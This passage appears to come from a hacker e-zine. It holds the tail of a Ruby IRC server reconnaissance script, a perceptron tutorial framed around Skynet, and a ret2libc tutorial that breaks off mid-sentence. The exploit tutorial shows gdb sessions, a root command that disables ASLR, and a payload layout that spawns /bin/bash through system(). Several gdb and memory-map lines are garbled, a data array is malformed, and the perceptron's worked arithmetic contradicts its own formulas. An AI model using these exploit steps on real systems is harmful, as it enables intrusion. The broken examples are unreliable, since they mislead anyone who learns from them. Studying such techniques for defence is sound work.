!@@ahash[achar][aserv] @@ahash[achar][aserv] = true puts "#{OUT_LABEL} STATS #{achar} #{aserv}" end end sleep(WAIT_SECS1) @@asock.puts('STATS ' << achar << ' ' << aserv) end puts l end rescue Exception => e show_except(e) end sleep(WAIT_SECS1) true end puts "#{OUT_LABEL} Executing list of remote raw IRC commands" servs.each do |s| puts "#{OUT_LABEL} Beginning to enumerate data from #{s} ..." IRC_NET_CMDS.each do |c| begin @@asock.puts(c << ' ' << s) rescue Exception => e show_except(e) end end ('a' .. 'z').each { |x| get_stats(x, s) } sleep(WAIT_SECS2) ('A' .. 'Z').each { |x| get_stats(x, s) } puts "#{OUT_LABEL} Finished enumerating data from #{s}!" end begin puts "#{OUT_LABEL} Reconnaissance sequence complete on all servers!" print "#{OUT_LABEL} Waiting on cleanup of outstanding threads" @@athread.kill() if @@athread puts "Done!" puts "#{OUT_LABEL} Displaying remaining server responses, then exiting." rescue end loop do begin l = @@asock.gets() next if !l or l.empty? if l.start_with?('ERROR') puts l break end x = l.split[3 .. -1] next if !x or x.empty? y = l.split[0 .. 2].join(' ') # Ignore erroneous STATS response codes next if y.include?(' 210 ') or y.include?(' 481 ') or y.include?(' 219 ') z = x.join(' ') next if not z or z.size <= 1 z = z[1 .. - 1] if z.start_with?(':') print '[' << y.split.first[1 .. -1] << '] ' puts z rescue Exception => e $stderr.puts(e.inspect) break end end puts OUT_LABEL puts "#{OUT_LABEL} Information gathering successful!" puts OUT_LABEL exit(0) #EOF ################################################################################ #***END*OF*FILE**DUPER'S*CODE*CORNER**A*HAXNET*#PROJECTS*PRODUCTION*(TM)2011***# ################################################################################ [==================================================================================================] -=[ 0x05 How Skynet Works: An Introduction to Neural Networks -=[ Author: elchupathingy -=[ IRC: irc.gonullyourself.org #gny Skynet was designed as a system to determine the greatest threat and determine the best course of action for survival. The real question about Skynet is not whether or not it will kill us, but rather how it will know to kill humans. The answer to that is quite simple through an understanding of machine learning. How does this work, and how does Skynet come to the conclusion to kill all humans? This is an area of Computer Science that describes and implements ways for computers to learn how to recognize and, in a way, "think" about data that is inputted into its learning algorithm. But what makes this possible? To continue this in depth, we need to first look into how the human brain works. At a high level, a symphony of biological, chemical, and electrical events and reactions combine to form what we perceive to be conscious thought. This is a rather simple view of the actual details, so let's take a closer look at one of these biological, chemical, and electrical events. The following is a simple ASCII art representation of a neuron: \/ Axon /\/< \/ \/ \ / \/ \__| \ _________ __/ \_____\__ / _______ \ / \ \/ >\ | \_________/ / \ \_/ |_____/___< \__/| ___________/ \__ | \ ___| / \__/ /\ / \___/ \ \ /\ / \ \ \ _/\ \ /\ \ / \ \ \ /\ /\ Nucleus Axon Terminal \ \ \ Dendrites From left to right: Dendrites: The inputs that receive electrochemical stimulation Nucleus: The "brain" and control center of the neuron The nucleus determines when the neuron fires and various other functions, but for this article we will only concern ourselves with its control over the firing process. Axon: Transmits electrical signals from the nucleus to the Axon terminals Axon Terminal: Emits electric impulses to be sent to other connecting neurons in the brain It should be noted that this is only a typical neuron, and there are many, many different kinds. Neurons function by accepting chemical inputs, building up an electrical charge, and firing an impulse when it is greater than a precisely defined threshold of the neuron. The event of firing an impulse is known as action potential. This event causes more chemicals to be released and, in effect, starts a chain reaction. This is the basic principle of how the brain performs computation. Now, how is this useful? A simple model of the neuron has to be developed. Lucky for this article, this has already been accomplished by Frank Rosenblatt, and it is called a perceptron. A perceptron is an artificial representation of a neural network and its ability to think and execute tasks. It contains: A set of inputs: X A set of weights: W A threshold function: G A threshold: T Like a neuron, the perceptron will only fire if its threshold is exceeded. The set of inputs, X, for this article will strictly be binary. The set of weights are floating point values 0 < W < 1. The threshold function is the summation of products of the weights and corresponding inputs, such that: / \ _N_ | _M_ | \ | \ | /__ | /__ Wij * Xij | i=0 | j=0 | \ / So, these pieces come together to form our perceptron. It can receive |x| inputs and, upon putting these inputs through the threshold function, it will either fire (returning a 1) or not fire (returning a 0). Now, to make this useful a few technicalities need to be covered. The first is that this model of the neuron, the perceptron, can have its weights changed but not its thresholds. Since we cannot directly change the threshold of the perceptron, we must add another input called the bias input. The bias input is a trick to allow the perceptron to change the threshold. This is done by fixing its value to -1. Doing so in effect makes the threshold of our perceptron a 0, but it also has the ability to fluctuate with the bias input's weight. This fluctuation allows the perceptron to find the optimal firing threshold. Shown below is the summation of the weights and inputs, including the bias input. The bias input is typically the first input, but this is not required and is just convention. -1 * W00 + X10 * W10 + X20 * W20 ... Xi0 * Wi0 = y0 -1 * W01 + X11 * W11 + X21 * W21 ... Xi1 * Wi0 = y1 . . . -1 * Wi(j - 3 + Xi(j - 2) * Wi(j - 2) + Xi(j - 1) * Wi(j - 1) ... Xij * Wij = y So, what does this mean? Now that the bias node has been added to the inputs, it has effectively changed our threshold value to 0 and provided the ability to change the threshold of the perceptron through manipulation of the weights. This makes the learning ability of the perceptron much stronger. Let's now cover the manual way of setting up a perceptron to learn some action or result. The basic logic operators are quite simple - they require two inputs and produce a single output, which can model whether the perceptron fires or not. Let's first look at OR. Truth table: _X1_|_X2_|_Y1_ 0 | 0 | 0 1 | 0 | 1 0 | 1 | 1 1 | 1 | 1 The truth table shows us the inputs that our perceptron will receive (X1 and X2) and the expected output (Y1). Now, lets figure out how to make the perceptron learn this logical function. First, we need to figure out what its weights will be. This is simple; they will start out as random numbers, such that -1.0 < Wij < 1.0. They can be one of infinite possibilities. As the neuron learns, the weights will change to simulate how a neuron learns. A neuron learns through a process of trial and error with the correct chemical balances to produce the correct firing threshold. The neuron in our context does the same through changing its weights. If the sum of the products of the weights and inputs doesn't cause the neuron to fire when it was supposed to, then the weights must be changed so that the neuron fires the next time it sees this input. Now, if the neuron is constantly changing the weights to reflect when it was supposed to fire and not supposed to fire, then the neuron can be said to be unstable. Thus we must introduce a mechanism to reduce the amount of instability in the neuron. This will be discussed further on. But, as it stands the neuron will never learn the entire problem. It will only learn a few of the inputs and expected outputs at a time and never completely generalize a solution. How can this be solved? The neuron simply "slows down" its ability to learn by changing the amount by which the weights are allowed to change. This is represented by N, or the learning rate (it has a fancy Greek name, but learning rate is more specific). It seems that we have strayed further away from getting our neuron to learn the simple logical operation OR, but all of this is needed. Back to the learning and weight changing. To get the new weight, we need to think of how this new weight will be found. If the weights can be seen as a function to get how we change it, we need to find the derivative of this function. The real derivation is quite annoying, so here is a simplified version that will suit the needs of the perceptron: dWij = ( Tk - Yk ) Xi The change of the weights, W, can be seen as a function of the Target outputs, Tk, and the real outputs, Yk, and the input, Xi, such that the new weight, Wij, will change in relation to the difference of the targets and outputs multiplied by the inputs. But, this raises the earlier problem of stability. In this manner the neuron will instantly learn the inputs and will ultimately forget any prior learning. Thus, we must retard its learning speed. This is accomplished through the use of a learning rate or eta, N. This will effectively act as a mechanism to remember old inputs. It does so by only taking a portion of the change needed to fix the neuron for the current inputs rather than the required amount. On a side note, it has been found that a N value that satisfies 0.1 < N < 0.4 is more than sufficient and bigger or smaller values lead to instability. With that being said, we have arrived at the following formula: Wij = Wij + N( Tk - Yk )Xi With this, we can finally begin to learn our logical operation OR. The first step is to choose the weights for our inputs, minding that there are in fact three weights that need to be picked out. W0 = -0.05, W1 = -0.02, W2 = 0.02 For the inputs, we will use the above truth table conveniently reproduced below: Truth table: _X1_|_X2_|_Y1_ 0 | 0 | 0 1 | 0 | 1 0 | 1 | 1 1 | 1 | 1 Let's start slugging through some numbers: X1 = 0 and X2 = 0 Y1: -1 * -0.05 + 0 * -0.02 + 0 * 0.02 = 0.05 The neuron fired when it shouldn't have, so the weights need to be modified. W0 = W0 + N ( 0 - 1 ) * -1 = -0.55 W1 = W1 + N ( 0 - 1 ) * 0 = -0.03125 W2 = W2 + N ( 0 - 1 ) * 0 = 0.03125 Ok, after fixing the weights for this input, we need to test the next input. X1 = 1 and X2 = 0 Y1: -1 * -0.55 + 1 * -0.03125 + 0 * 0.03125 = 0.51875 This fired when it was supposed to, so the weights do not need to be adjusted. X1 = 0 and X2 = 1 Y1: -1 * -0.55 + 0 * -0.03125 + 1 * 0.03125 = 0.58125 The neuron fired when it should have, so the weights do not need to be adjusted. X1 = 1 and X2 = 1 Y1: -1 * -0.55 + 1 * -0.03125 + 1 * 0.03125 = 0.55 Again, this neuron fired when it should have, so no weight changes are needed. Now, the process is complete... for this iteration. We have to continue doing this until the network stabilizes and this happens when all the outputs are equal to the targets and the weights stop moving around. This will take 4-5 iterations for this particular example. Eventually, the weights will settle down and the perceptron will have learned this function. But, how does this work, exactly? It works by dividing the set of solutions into two groups, such that if we graph it we can draw a line between the points. *'s mean the perceptron fired. +'s mean the perceptron did not fire. 1|* * | | | | |+___________* 0 1 Looking at this graph, it is easy to see that there is a line that divides the points, making it look like the following: 1|* * \ |\ | \ | \ |+__\________* 0 \ 1 As the graph shows, the line divides them with all the *'s on one side and all the +'s on the other. Now, where did this line come from? It came from the weights, which in this example are the coefficients to the line function: aX + bY = C There is a lengthy process to prove this through a few vector calculations and using the inner product of two vectors, but the basic idea of this is that there exists a line, plane, or hyperplane through the set of points that separates the points into two distinct sets. Planes and hyperplanes? Yes, these are the solutions for when there are more than two inputs into the perceptron. An example is found at the end of the article. So, a problem that can be solved by a perceptron has to have the following properties: 1: Linearly separable via a line, plane, or hyperplane. 2: Responds to a firing or no firing, thus a yes or no question essentially. 3: Grouped into distinct classes. Let's look at the following example of something that is not linearly separable by a line. Logical function XOR: _X1_|_X2_|_Y1_ 0 | 0 | 0 1 | 0 | 1 0 | 1 | 1 1 | 1 | 0 The Graph of XOR: 1|* + | | | | |+___________* 0 1 Looking at the truth table doesn't shed any light on whether this is linearly separable or not, but looking at the graph shows that there is no line such that the +'s and *'s are in separate partitions. Thus, XOR cannot be solved like we did OR; it must be put into a higher dimension. We will use 3D to do that. We will add another bit of information to separate the two groups, *'s and +'s, so that our perceptron can solve it. Let's look over at the JavaScript and HTML page to help do this for us. When first loading this page, it will have the defaults for the OR function we worked out earlier. On this page, the number of Iterations and Learning Rate may be changed, and these various options can be tested by pressing the "start" button. But, what we want to focus on is the in the Code text area. The default looks like the following: var inputs = [ [ 0, 0 ], [ 0, 1 ], [ 1, 0 ], [ 1, 1 ] ]; var targets = [ 0, 1, 1, 1 ]; var dimensions = 2; Notice that they are arrays and 'input' is a 2D array. The length of 'inputs' must be equal to that of 'targets', and 'dimensions' must be equal to the length of each sub-array of 'inputs'. This is so that the code can make the weights vector correctly. Now, we need to make the change to the code section so that we can get our perceptron to learn the XOR logical operation. var inputs = [ [ 0, 0, 1 ], [ 0, 1, 0 ], [ 1, 0, 0 ], [ 1, 1, 0 ] ]; First, we need to change the inputs to be in a 3D space. We have lifted up the first input so that it will not be in the same plane as the other inputs. This single change is all that is needed to make the XOR learnable. The targets vector is changed to the following: var targets = [ 0, 1, 1, 0 ]; This is to reflect how the XOR operation works. And, finally the number of dimensions needs to be changed to 3. var dimensions = 3; Now, change the number of iterations to 30, leave the Learning Rate at the default 0.25, and click start. The perceptron should be able to solve the problem. If it did not, hit start again and scroll through the output textarea to see if it has solved it. In the 'weights' textarea are the various weight values that are used during the learning process. An exercise would be to look at the weights as the perceptron tries to learn the XOR using a 2D input matrix. The graph for this looks like the following: (0,0,1)|+ | | | (0,0,0)|__________________*(0,1,0) / / / / (1,0,0)*/ +(1,1,0) It's somewhat difficult to reproduce a 3d plane in ASCII, so just imagine one going through the +'s and *'s. The same idea before applies here; the perceptron is looking to solve the equation of the plane that separates the two sets. This can be expanded further, but even ASCII lacks the ability to draw in 4D. So, how is this a process of learning? The process detailed above is a process of a single perceptron, neuron, to learn how to solve a linearly separable set of points. It has gained the ability to generalize a solution to a simple problem and is able to accurately give an answer to all of its inputs. But, we have simply given it all of the possible outcomes and trained our perceptron on the actual data. In practice, this is not possible. What happens now is that to learn against bigger sets of data, a process of training must be developed. The proper way to train a perceptron or a neural network in an assisted manner is to feed it half of the data then check against the other half of the data. Using the perceptron that is in the JavaScript, we can do just that using provided data for our use. Let's look at the following data collected from the Pima Indian's dataset: var inputs = [ ], [4,110,92,0,0,37.6,0.191,30,0], [10,168,74,0,0,38.0,0.537,34,1], [10,139,80,0,0,27.1,1.441,57,0], [1,189,60,23,846,30.1,0.398,59,1], [5,166,72,19,175,25.8,0.587,51,1], [7,100,0,0,0,30.0,0.484,32,1], [0,118,84,47,230,45.8,0.551,31,1], [7,107,74,0,0,29.6,0.254,31,1], [1,103,30,38,83,43.3,0.183,33,0], [1,115,70,30,96,34.6,0.529,32,1], [3,126,88,41,235,39.3,0.704,27,0], [8,99,84,0,0,35.4,0.388,50,0], [7,196,90,0,0,39.8,0.451,41,1], [9,119,80,35,0,29.0,0.263,29,1], [11,143,94,33,146,36.6,0.254,51,1], [10,125,70,26,115,31.1,0.205,41,1], [7,147,76,0,0,39.4,0.257,43,1], [1,97,66,15,140,23.2,0.487,22,0], [13,145,82,19,110,22.2,0.245,57,0], [5,117,92,0,0,34.1,0.337,38,0], [5,109,75,26,0,36.0,0.546,60,0], [3,158,76,36,245,31.6,0.851,28,1], [3,88,58,11,54,24.8,0.267,22,0], [6,92,92,0,0,19.9,0.188,28,0], [10,122,78,31,0,27.6,0.512,45,0], [4,103,60,33,192,24.0,0.966,33,0], [11,138,76,0,0,33.2,0.420,35,0], [9,102,76,37,0,32.9,0.665,46,1], [2,90,68,42,0,38.2,0.503,27,1], [4,111,72,47,207,37.1,1.390,56,1], [3,180,64,25,70,34.0,0.271,26,0], [7,133,84,0,0,40.2,0.696,37,0], [7,106,92,18,0,22.7,0.235,48,0], [9,171,110,24,240,45.4,0.721,54,1], [7,159,64,0,0,27.4,0.294,40,0], [0,180,66,39,0,42.0,1.893,25,1], [1,146,56,0,0,29.7,0.564,29,0] ]; var targets = []; for( var i = 0; i < inputs.length; i++ ) { targets.push( inputs[i].pop() ); } var dimensions = 9; This dataset represents a subset of Pima Indian population and if each individual has diabetes (the last column, which is popped off and put into 'targets'). If this code is placed into the code textarea, the accuracy of the perceptron correctly telling if someone has diabetes or not is almost non-existent. Unlike the above examples, this data set cannot be graphed and is a good example of real world data. From this, you cannot train on all of the data, but rather you must train on a subset of the data and then perform a check on the rest of the data, thus more accurately gauging the perceptron's ability to learn and generalize its solution. How do we do the training on the subset of the data? On the HTML page, there is a check box that, when checked, will simply split the data in half and train on one half of the data and test with the other half. This is quite useful and can gauge how well the perceptron is able to generalize its solution to the set of data that has been presented. This method can help verify how well the perceptron has learned something. Another method to help improve the learning ability of the perceptron is to normalize the data or, in essence, take out the data's variance which will allow the perceptron to more easily learn the problem. You, the reader, has been hoping all this time to learn the answer to the initial question of this article - how does Skynet work? However, all you got instead was some garbled math and a web page. But, the principle behind this method is how Skynet could learn, classify dangerous enemies, and ultimately kill all humans. Some other applications for this perceptron and neural networks are: - OCR to break captchas. - Giving a user recommend items. - Predicting future events based on past ones. - Fitting a line, plane, or hyperplane to a set of data. - Many more. Enjoy, Elchupathingy [==================================================================================================] -=[ 0x06 Defeating NX/DEP With return-to-libc and ROP -=[ Author: storm -=[ Website: Table of Contents I. Introduction II. Background III. The Problem IV. Return-to-libc V. Return-to-PLT VI. Return-to-PLT + GOT Overwrite VII. Return-to-libc by neg ROP VIII. References and Further Reading I. Introduction =============== The return-to-libc attack, commonly abbreviated as ret2libc, is a method of exploiting memory corruption vulnerabilities on systems enabling non-executable (NX) stacks. First publicly discussed by the security researcher Solar Designer in the late 90s, ret2libc attacks are still relevant in the modern realm of exploitation, but have mostly made way for Return-Oriented Programming (ROP), which is a generalization of the ret2libc technique. It should be noted that all technical examples in this paper were performed on a Fedora Core 14 machine. While many of these techniques are universal, some OSes may employ certain memory protections by default that break the examples. For instance, stack canaries are enabled by default on Ubuntu systems and should be disabled with the gcc -fno-stack-protector-all flag at compile-time. II. Background ============== Before proceeding, the reader should be familiar with traditional stack-based buffer overflows. For the sake of comprehension, a short review will be provided. It should be noted that in this simple example, memory protections such as DEP, ASLR, and stack canaries are disabled. Given the following source code (from): #include <string.h> void foo (char *bar) { char c[12]; strcpy(c, bar); // no bounds checking... } int main (int argc, char **argv) { foo(argv[1]); } We can see that argv[1] is passed as an argument to the function foo(). A buffer of 12 bytes is allocated and given the name 'c'. A call to strcpy() copies the string from the buffer 'bar' (formerly argv[1]) into 'c'. The problem lies within the fact that no bounds check is performed on the buffer 'bar' before being copied into 'c', allowing any string greater than 12 bytes long (trailing null byte included) to be written past the 12 bytes allocated. By allowing this, we have the potential to overwrite data on the stack critical to the program's behavior. Specifically, a pointer saved on the stack named the "return address" is of particular interest to us. This pointer is present on the stack due to the way function calls are performed within programs. Let's step our way through foo() in the program above. Here, we set a breakpoint just before the call is initiated: Breakpoint 1, 0x080483f2 in main () (gdb) x/5i $eip => 0x80483f2 <main+20>: call 0x80483c4 <foo> 0x80483f7 <main+25>: leave 0x80483f8 <main+26>: ret 0x80483f9: nop 0x80483fa: nop (gdb) x/16x $esp 0xbfffefb0: 0xbffff265 0x08048310 0x0804840b 0x00381ff4 0xbfffefc0: 0x08048400 0x00000000 0xbffff048 0x00212e36 0xbfffefd0: 0x00000002 0xbffff074 0xbffff080 0xb7fff478 0xbfffefe0: 0x00110414 0xffffffff 0x001f8fbc 0x0804822c (gdb) We start off by looking at the state of the stack before the function call. Continuing, let's take this step-by-step. (gdb) si 0x080483c4 in foo () (gdb) x/16x $esp 0xbfffefac: 0x080483f7 0xbffff265 0x08048310 0x0804840b 0xbfffefbc: 0x00381ff4 0x08048400 0x00000000 0xbffff048 0xbfffefcc: 0x00212e36 0x00000002 0xbffff074 0xbffff080 0xbfffefdc: 0xb7fff478 0x00110414 0xffffffff 0x001f8fbc For those unfamiliar with gdb, note that the 'si' command is shorthand for 'step instruction', which allows us to walk through the assembly code instruction-by-instruction. We see that by entering foo(), the pointer 0x080483f7 is pushed onto the stack. Looking above, we notice that this is the address of the next instruction within main(). This pointer is the return address and will later be popped back into %eip in the epilogue of foo(). Continuing: (gdb) x/10i $eip => 0x80483c4 <foo>: push %ebp ; Push the frame pointer onto the stack 0x80483c5 <foo+1>: mov %esp,%ebp ; Address of saved fp becomes new %ebp 0x80483c7 <foo+3>: sub $0x28,%esp ; Allocate space for local variables 0x80483ca <foo+6>: mov 0x8(%ebp),%eax ; Copy pointer to 'bar' to %eax 0x80483cd <foo+9>: mov %eax,0x4(%esp) ; Set up 'bar' as 2nd arg to strcpy() 0x80483d1 <foo+13>: lea -0x14(%ebp),%eax ; Copy pointer to 'c' to %eax 0x80483d4 <foo+16>: mov %eax,(%esp) ; Set up 'c' as 1st arg to strcpy() 0x80483d7 <foo+19>: call 0x80482f4 <strcpy@plt> ; Perform library call to strcpy() 0x80483dc <foo+24>: leave ; Copy %ebp to %esp, pop fp to %ebp 0x80483dd <foo+25>: ret ; Pop return address to %eip (gdb) By manipulating the return address stored on the stack before the function epilogue, we directly influence the value of %eip, redirecting execution of the program to anywhere we choose. Setting a breakpoint for 0x80483d7, let's look at the stack just before the strcpy() call: Breakpoint 2, 0x080483d7 in foo () (gdb) x/16x $esp 0xbfffef80: 0xbfffef94 0xbffff265 0xbfffef98 0x080482c0 0xbfffef90: 0x00000000 0x08049644 0xbfffefc8 0x08048419 0xbfffefa0: 0xb7fff478 0x00382cc0 0xbfffefc8 0x080483f7 0xbfffefb0: 0xbffff265 0x08048310 0x0804840b 0x00381ff4 (gdb) We see that strcpy() is being given two pointers as first and second arguments, a pointer to the buffer 'c', and a pointer to the buffer 'bar', respectively. We also see our saved frame pointer and return address located lower on the stack at 0xbfffefa8 and 0xbfffefac, respectively. By writing 0xbfffefb0 - 0xbfffef94 = 0x1c = 28 bytes to 'c', we have full EIP overwrite and control over the program: (gdb) delete Delete all breakpoints? (y or n) y (gdb) break *0x80483dd Breakpoint 3 at 0x80483dd (gdb) run `perl -e'print "A"x28'` Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x28'` Breakpoint 3, 0x080483dd in foo () (gdb) x/i $eip => 0x80483dd <foo+25>: ret (gdb) x/x $esp 0xbfffef8c: 0x41414141 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x080483dd in foo () (gdb) By stashing compiled code on the stack itself, we redirect execution to the location of our "shellcode" and drop a shell: (gdb) run x41414141xb7fff478 0x00110414 0xffffffff 0x001f8fbc We see our shellcode is located at 0xbfffef70, so let's now overwrite the return address with this, ordering the bytes in reverse to account for little endianness: (gdb) run xbfffef70x00111478 0x00110414 0xffffffff 0x001f8fbc (gdb) c Continuing. process 22006 is executing new program: /bin/bash sh-4.1$ III. The Problem ================ Modern hardware and operating systems support a feature called NX bit/DEP, which flags regions of memory as non-executable. As a security precaution, compilers now mark the stack non-executable to prevent the execution of shellcode in buffer overflow attacks. Thus, overwriting the return address with the address of our shellcode on the stack results in a segfault. To exemplify this point, we can see specifically which regions of memory have what permissions using the following program: #include <stdio.h> int main (int argc, char **argv) { FILE *fp = fopen("/proc/self/maps", "r"); char line[1024]; while(fgets(line, sizeof(line), fp) != NULL) { printf("%s", line); } fclose(fp); return 0; } By running this program, we print the contents of /proc/self/maps. We see that by default, our program's stack does not possess +x permissions: [storm@Dysthymia audit]$ ./stacky 001db000-001f8000 r-xp 00000000 fd:01 19335 /lib/ld-2.13.so 001f8000-001f9000 r--p 0001c000 fd:01 19335 /lib/ld-2.13.so 001f9000-001fa000 rw-p--p 00183000 fd:01 24337 /lib/libc-2.13.so 00382000-00383000 rw-p 00185000 fd:01 24337 /lib/libc-2.13.so 00383000-00386000 rw-p 00000000 00:00 0 00d21000-00d22000 r-xp 00000000 00:00 0 [vdso] 08048000-08049000 r-xp 00000000 fd:03 339055 /home/storm/Desktop/audit/stacky 08049000-0804a000 rw-p 00000000 fd:03 339055 /home/storm/Desktop/audit/stacky 0990b000-0992c000 rw-p 00000000 00:00 0 [heap] b7893000-b7894000 rw-p 00000000 00:00 0 b78ae000-b78b0000 rw-p 00000000 00:00 0 bfcf5000-bfd16000 rw-p 00000000 00:00 0 [stack] [storm@Dysthymia audit]$ We can manually flip the executable stack flag in our program's ELF header, disabling this memory protection for the program: [storm@Dysthymia audit]$ execstack -s ./stacky [storm@Dysthymia audit]$ ./stacky 00110000-0011100034f000-00350000 rwxp 00000000 00:00 0 00350000-004d3000 r-xp 00000000 fd:01 24337 /lib/libc-2.13.so 004d3000-004d4000 ---p 00183000 fd:01 24337 /lib/libc-2.13.so 004d4000-004d6000 r-xp 00183000 fd:01 24337 /lib/libc-2.13.so 004d6000-004d7000 rwxp 00185000 fd:01 24337 /lib/libc-2.13.so 004d7000-004da000 rwxp 00000000 00:00 0 00673000-00674000 r-xp 00000000 00:00 0 [vdso] 009d5000-009d6000 rwxp 00000000 00:00 0 08048000-08049000 r-xp 00000000 fd:03 339088 /home/storm/Desktop/audit/stacky 08049000-0804a000 rwxp 00000000 fd:03 339088 /home/storm/Desktop/audit/stacky 08adf000-08b00000 rwxp 00000000 00:00 0 [heap] bfa61000-bfa82000 rwxp 00000000 00:00 0 [stack] [storm@Dysthymia audit]$ You may have noticed something odd about the output this program. Comparing the output of the two separate times running the program, we also notice that the addresses of loaded libraries and certain other areas of memory changed. This is due to a memory protection technique called Address Space Layout Randomization (ASLR). By randomizing the location of data in a process's address space, exploit writers cannot reliably predict where certain key functions or code are located in memory, turning reliable exploits into improbable gambles. An area of research is devoted to exploiting applications enabled with ASLR, but that is much beyond the scope of this paper. For the sake of taking one step at a time, let's disable ASLR for our examples: [storm@Dysthymia audit]$ su - [root@Dysthymia ~]# echo 0 > /proc/sys/kernel/randomize_va_space [root@Dysthymia ~]# logout ]$ Much better. Getting back to the original problem, the question is, how can an attacker successfully and reliably exploit a simple stack-based buffer overflow when the stack is flagged non-executable? With ret2libc, of course! IV. Return-to-libc ================== The premise of ret2libc is actually quite simple. Thinking back to how a standard buffer overflow works, we recognize that our ultimate goal is to return into code that does our evil bidding, most likely dropping a bash prompt or spawning a reverse shell. Knowing that we are unable to provide our own code to return into (thanks to non-executable stack and heap), we must take a step back and think about our options. Our guidelines are as follows: - Code must be (obviously) present in the process's address space at the time of exploitation - Code must be flagged executable - Code must be located at a predictable address - Code must perform an action that is beneficial to our goals (spawning a shell) Where will we ever find code that satisfies all of our needs? Oh, right. libc, the C standard library implementation on Linux. Let's let Wikipedia be our guide: The C standard library consists of a set of sections of the ANSI C standard in the programming language C. They describe a collection of headers and library routines used to implement common operations such as input/output and string handling. Unix-like systems typically have a C library in shared library form. - To clarify and expand on the definition, libc is a shared library present on nearly all Linux systems that is, by default, linked against every program compiled with gcc. libc is an implementation of the C standard, providing the code that performs common, rudimentary operations such as printing strings and allocating memory. Every time you make a function call to printf() or malloc() from within a C program, you are most likely running code in libc. Let's go down our checklist. libc is certainly present in the address space of almost every process running on Linux. The code is flagged executable, because it is legitimate code used by the program itself. By disabling ASLR, we are ensuring that the library will be loaded at the same base address every time, allowing us to reliably predict where in memory it will be located. Since libc provides an exceptionally wide array of functions, there is a good chance we can abuse one of them to gain access to the system. Let's start building a template for our exploit: AAAAAAAAAAAAAAAAAAAAAAAA [ libc function ] [ return-to ] [ arg1 ] [ arg2 ] ... ^ ^ | | | | | | overflow ("A"x24) -------------------------------------- Obviously, we want to return into a libc function that lets us execute arbitrary code. A good candidate is system(), although there are a number of methods using different functions. [storm@Dysthymia audit]$ gdb -q ./example Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done. (gdb) break main Breakpoint 1 at 0x80483e1 (gdb) run Starting program: /home/storm/Desktop/audit/example Breakpoint 1, 0x080483e1 in main () (gdb) p system $1 = {<text variable, no debug info>} 0x235eb0 <__libc_system> (gdb) Looking at the output of gdb, we see that system() resides in memory at 0x00235eb0, so let's add that to our exploit. AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ return-to ] [ arg1 ] [ arg2 ] ... ^ ^ | | | | | | overflow ("A"x24) -------------------------------------- &system Now we need to provide an argument to system(), which is a pointer to a null-terminated string of the command being executed. The simple solution is just to give it a pointer to "/bin/bash", which we can do by either a) writing it into memory after the exploit string itself, or b) re-using an already existing instance of the string in memory. Let's be lazy and choose the latter. (gdb) find $esp, 0xbfffffff, "/bin/bash" 0xbffff310 1 pattern found. (gdb) x/s 0xbffff310 0xbffff310: "/bin/bash" (gdb) x/s 0xbffff30a 0xbffff30a: "SHELL=/bin/bash" (gdb) Conveniently, we can leverage the SHELL environment variable here. Now that we have a pointer to our command string, let's update the exploit. AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ return-to ] [ \x10\xf3\xff\xbf ] ^ ^ | | | | overflow ("A"x24) ------------------------------------ &system arg1: "/bin/bash" The return-to pointer actually serves as the return address for our libc function. This by nature isn't necessary to set for the exploit to work, but it's common to return to exit() afterwards to end the process cleanly and prevent any alerts due to a crashed process. These alerts may be viewed by monitoring the tail of /var/log/messages (on most distributions). (gdb) p exit $2 = {void (int)} 0x22ac00 <exit> (gdb) For the sake of adding more unnecessary arrows to the diagram, our finished exploit now looks like: &exit -------------------- | \/ AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ \x00\xac\x22\x00 ] [ \x10\xf3\xff\xbf ] ^ ^ | | | | overflow ("A"x24) ---------------------------------------------- &system arg1: "/bin/bash" Yeah, cool. Too bad it doesn't work. As you probably noticed, our exploit contains null bytes everywhere. This is a huge problem, since we're using strcpy() to copy our exploit string and it will stop as soon as the first null byte is encountered. There are actually two factors contributing to having null bytes in this exploit. The first, most prominent factor is a memory protection called ASCII-Armor, which maps important libraries to addresses that contain a null byte. As observed, the addresses of system() and exit(), as well as every other function in libc, started with 0x00. The second factor is due to there coincidentally being a null byte present elsewhere in the address of exit(). In addition to ASCII-Armor, the least significant byte of the address is also 0x00. This is not an especially huge issue, however, since we can simply jump to an offset of exit() that doesn't alter its actual functionality. Let's take a look: (gdb) x/10i exit 0x22ac00 <exit>: push %ebp 0x22ac01 <exit+1>: mov %esp,%ebp 0x22ac03 <exit+3>: push %edi 0x22ac04 <exit+4>: push %esi 0x22ac05 <exit+5>: push %ebx 0x22ac06 <exit+6>: call 0x212c6f <__i686.get_pc_thunk.bx> 0x22ac0b <exit+11>: add $0x1573e9,%ebx 0x22ac11 <exit+17>: sub $0x2c,%esp 0x22ac14 <exit+20>: mov 0x8(%ebp),%edi 0x22ac17 <exit+23>: mov 0x330(%ebx),%esi (gdb) 0x0022ac01 looks pretty good. The only instruction we're skipping is push %ebp, which won't matter anyways since exit() doesn't return, thus having no need to unwind the stack. Note that should a positive offset (exit+X) not exist, we can instead search lower in memory and find a potential negative offset (exit-X). We can do this because the function adjacent to exit() doesn't terminate with a ret instruction, so jumping into it won't return but instead continue executing into the next function, which is conveniently exit(). (gdb) x/3i exit-1 0x22abff: add %dl,-0x77(%ebp) 0x22ac02 <exit+2>: in $0x57,%eax 0x22ac04 <exit+4>: push %esi (gdb) Oop, looks like an offset of -1 will cause instructions in exit() to be interpreted incorrectly. Remember that everything in memory is simply data until it is interpreted and given meaning, so by jumping in the middle of a multi-byte opcode, we are literally interpreting it to be a different instruction. If this new instruction is smaller than the rest of the original one, then instructions after it will be affected and interpreted differently also. Let's try an offset of -2: (gdb) x/3i exit-2 0x22abfe: jbe 0x22ac00 <exit> 0x22ac00 <exit>: push %ebp 0x22ac01 <exit+1>: mov %esp,%ebp (gdb) At -2, the exit() function is interpreted correctly, but the two bytes before it are interpreted to be a conditional jump instruction. This introduces major possibility for the flow of execution to be thrown off, so let's disregard this option and check offset -3: (gdb) x/3i exit-3 0x22abfd: lea 0x0(%esi),%esi 0x22ac00 <exit>: push %ebp 0x22ac01 <exit+1>: mov %esp,%ebp (gdb) An offset of -3 looks like a good option. The three bytes before exit() are interpreted to be a harmless lea (load effective address) instruction which won't affect the interpretation or proper functionality of exit(). So, if for some reason 0x0022ac01 